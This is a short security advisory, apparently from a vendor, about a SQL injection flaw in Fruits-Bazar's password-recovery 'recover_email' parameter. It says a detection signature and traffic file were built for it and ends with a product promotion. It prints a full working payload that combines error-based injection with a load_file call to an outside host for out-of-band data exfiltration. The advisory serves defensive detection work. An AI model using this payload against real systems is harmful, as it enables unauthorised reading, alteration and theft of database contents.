Fruits-Bazar is vulnerable to SQL injection.
A remote attacker could send specially crafted SQL statements using the 'recover_email' parameter, which could allow the attacker to view, add, modify or delete information in the back-end database.
PAYLOAD - recover_email=cNCbIfqe@nama1k@t1putkat@mang@lsk@.net' (select load_file('\\\\kym3yjdn7xn8kasrttyp7av9x03trsqghj5bs1gq.namaikatiputkatam@ng@ls@.com\\olg')) '' AND (SELECT 6160 FROM(SELECT COUNT(*),CONCAT(0x7178627171,(SELECT (ELT(6160=6160,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mvga'='Mvga&u_pass_recover=Recover Password
By turning this into a traffic file and matching rule, we are able to detect attempts to influence the vulnerable parameter with SQL injections.
Idappcom has created signature 8022835 along with a traffic file.
If you are concerned that your business may be at risk of this vulnerability, or others, why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional